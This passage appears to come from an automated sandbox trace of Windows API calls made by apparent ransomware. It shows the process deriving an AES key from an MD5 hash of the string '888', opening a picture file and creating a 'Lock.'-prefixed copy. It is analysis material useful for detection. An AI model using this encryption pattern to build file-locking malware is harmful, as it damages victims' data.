hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.378] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.379] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.379] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.379] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.379] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.379] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.379] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.379] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.379] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.379] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.379] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.379] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.379] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.379] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.379] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.379] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab3b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.380] CryptCreateHash (in: hProv=0xa7c2a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71be8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.380] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.380] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.380] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.381] CryptHashData (hHash=0x9e2078, pbData=0x2a71ca8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.381] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.381] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.381] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.381] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab260, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.381] CryptDeriveKey (in: hProv=0xa7c2a8, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0210.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.382] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.382] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.382] CryptDestroyHash (hHash=0x9e2078) returned 1 [0210.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.383] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Hv6N_Hm7BbFlazd6N.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\hv6n_hm7bbflazd6n.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.384] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.384] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0210.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a739f8 [0210.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.386] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739f8 | out: hHeap=0x2af0000) returned 1 [0210.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0210.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0210.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.Hv6N_Hm7BbFlazd6N.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.hv6n_hm7bbflazd6n.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.387] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0210.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.389] HeapFree 